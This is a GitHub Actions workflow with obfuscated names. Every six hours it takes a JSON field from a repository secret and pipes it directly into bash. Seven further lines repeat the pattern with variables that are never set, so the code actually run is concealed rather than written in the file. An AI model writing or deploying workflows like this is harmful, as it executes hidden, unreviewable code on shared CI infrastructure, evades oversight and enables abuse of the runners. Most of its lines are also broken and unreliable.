name: laojiangzhongzheng

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laojiangzhongzheng
        env:
          pvuv1: ${{ secrets.pvuv1 }}
        run: |
          echo $pvuv1 | jq -r .kl75025 | /bin/bash
          echo $kzyc69 | jq -r .tdik5018 | /bin/bash
          echo $znlq2189 | jq -r .vk81388 | /bin/bash
          echo $mbsv448 | jq -r .uar4335 | /bin/bash
          echo $qy1226 | jq -r .pdp42 | /bin/bash
          echo $ucumf875 | jq -r .zky13858 | /bin/bash
          echo $kll02 | jq -r .kiny34 | /bin/bash
          echo $e89 | jq -r .b4 | /bin/bash

